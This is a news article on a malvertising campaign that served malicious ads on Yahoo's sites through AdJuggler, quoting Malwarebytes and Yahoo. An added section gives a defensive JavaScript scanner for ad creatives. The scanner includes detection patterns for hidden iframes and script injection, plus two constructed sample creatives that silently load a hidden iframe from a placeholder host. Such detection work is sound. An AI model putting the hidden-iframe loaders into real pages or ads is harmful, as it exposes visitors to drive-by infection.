Last week, users who visited any of Yahoo's sites (news, gaming or finance, among others) could have been infected with malware without clicking on anything: viewing the page with its ads was enough.
Security company Malwarebytes Labs uncovered this, publishing it on its blog on Monday. By then, Yahoo had taken action to stop the malvertising campaign.
According to data from SimilarWeb, Yahoo!’s website has an estimated 6.9 billion visits per month, making it “one of the largest malvertising attacks we have seen recently,” said Malwarebytes Labs.
Jérôme Segura, a senior security researcher at Malwarebytes, said that the attack began when AdJuggler, a trusted advertising partner that distributes ads for Yahoo, "got abused by rogue advertisers that uploaded a malicious ad that got displayed on the main site."
As people browsed the site, the ad automatically, without any type of user interaction, loaded malicious code silently in the background and attempted to infect the computer with a piece of malware, Segura added in an article on Silicon Beat.
Yahoo quickly acted, later issuing a statement:
“Yahoo is committed to ensuring that both our advertisers and users have a safe and reliable experience. As soon as we learned of this issue, our team took action and will continue to investigate this issue.
Unfortunately, disruptive ad behavior affects the entire tech industry. Yahoo has a long history of engagement on this issue and is committed to working with our peers to create a secure advertising experience. We’ll continue to ensure the quality and safety of our ads through our automated testing and through the SafeFrame working group, which seeks to protect consumers and publishers from the potential security risks inherent in the online ad ecosystem.”
“Malvertising is a silent killer because malicious ads do not require any type of user interaction in order to execute their payload. The mere fact of browsing to a website that has adverts (and most sites, if not all, do) is enough to start the infection chain,” said Malwarebytes Labs in its blog.
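Segura's description and the Malwarebytes quote above come down to the same mechanism: the creative itself is the delivery vehicle, pulling exploit content from a host the ad network never vetted, with nothing for the user to click. The script below is an added example, not code from Malwarebytes, Yahoo or AdJuggler, of the kind of static creative scan an ad network or publisher can run before a creative goes live. It flags the three hallmarks of that pattern: iframes styled to be invisible, script that injects frames or script tags at render time, and any reference to a host the advertiser did not declare. The allowlisted hosts, the three sample creatives and the regex rules are all constructed for this example.

```javascript
// Added example (not from the article or the companies named in it):
// a static scanner for HTML5 ad creatives that looks for the silent drive-by
// pattern described above. Hosts, rules and sample creatives are constructed.

// Hosts the advertiser declared when booking the campaign (hypothetical).
const ALLOWED_HOSTS = new Set([
  "cdn.example-adnetwork.test",   // ad network CDN serving the banner image
  "shop.example-advertiser.test", // advertiser landing page for the click-through
]);

// Styling that makes an iframe invisible to the user while it still loads.
const HIDDEN_PATTERNS = [
  /\bwidth\s*[=:]\s*["']?0(px)?\b/i,
  /\bheight\s*[=:]\s*["']?0(px)?\b/i,
  /display\s*:\s*none/i,
  /visibility\s*:\s*hidden/i,
  /(left|top)\s*:\s*-\d+/i,
];

// Runtime injection of frames or scripts: the creative "loads code in the background".
const INJECTION_PATTERNS = [
  /createElement\s*\(\s*["'`](iframe|script|embed|object)["'`]\s*\)/i,
  /document\.write(ln)?\s*\(/i,
  /\.innerHTML\s*=/i,
  /\beval\s*\(/i,
  /\bunescape\s*\(|String\.fromCharCode/i,
];

// Pull every absolute URL out of markup, attributes and inline script strings.
function extractUrls(markup) {
  return markup.match(/https?:\/\/[^\s"'`<>)]+/gi) || [];
}

function hostOf(url) {
  try { return new URL(url).hostname.toLowerCase(); } catch { return null; }
}

// Returns a list of {rule, evidence} findings; an empty list means nothing flagged.
function scanCreative(markup) {
  const findings = [];

  for (const tag of markup.match(/<iframe\b[^>]*>/gi) || []) {
    if (HIDDEN_PATTERNS.some((re) => re.test(tag))) {
      findings.push({ rule: "hidden-iframe", evidence: tag });
    }
  }

  for (const re of INJECTION_PATTERNS) {
    const m = markup.match(re);
    if (m) findings.push({ rule: "dynamic-injection", evidence: m[0] });
  }

  for (const url of extractUrls(markup)) {
    const host = hostOf(url);
    if (host && !ALLOWED_HOSTS.has(host)) {
      findings.push({ rule: "undeclared-host", evidence: url });
    }
  }
  return findings;
}

// Sorted, de-duplicated rule names, convenient for review queues and tests.
function rulesHit(markup) {
  return [...new Set(scanCreative(markup).map((f) => f.rule))].sort();
}

// Constructed sample creatives: one clean banner and two drive-by variants.
const BENIGN = `
<a href="https://shop.example-advertiser.test/sale">
  <img src="https://cdn.example-adnetwork.test/banner-300x250.png" width="300" height="250">
</a>`;

const DRIVE_BY_INJECTED = `
<img src="https://cdn.example-adnetwork.test/banner-300x250.png" width="300" height="250">
<script>
  // nothing for the user to click: the frame is created and hidden as the page renders
  var f = document.createElement('iframe');
  f.style.display = 'none';
  f.src = 'https://landing.unknown-host.test/gate.php?id=1';
  document.body.appendChild(f);
</script>`;

const DRIVE_BY_STATIC = `
<img src="https://cdn.example-adnetwork.test/banner-300x250.png" width="300" height="250">
<iframe src="https://landing.unknown-host.test/gate.php?id=2" width="0" height="0" style="visibility:hidden"></iframe>`;

for (const [name, markup] of Object.entries({ BENIGN, DRIVE_BY_INJECTED, DRIVE_BY_STATIC })) {
  console.log(name, rulesHit(markup), scanCreative(markup));
}
```

A static pass like this is a gate, not a verdict: legitimate creatives use `document.write` and third-party measurement pixels, so each rule is a reason for review, and a creative can be written to fetch its real payload only after it has passed static checks. Networks that take this seriously also render each creative in an instrumented browser and record every host it contacts.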
In 2014, Malwarebytes Labs also reported that Google DoubleClick had been hit by hackers in a malvertising attack.
According to a Forbes article, cyber criminals made an estimated US$25,000 a day by serving malicious ads through compromised advertising networks to a host of big-name websites, including Yahoo and AOL, which in turn infected the PCs of users who visited them.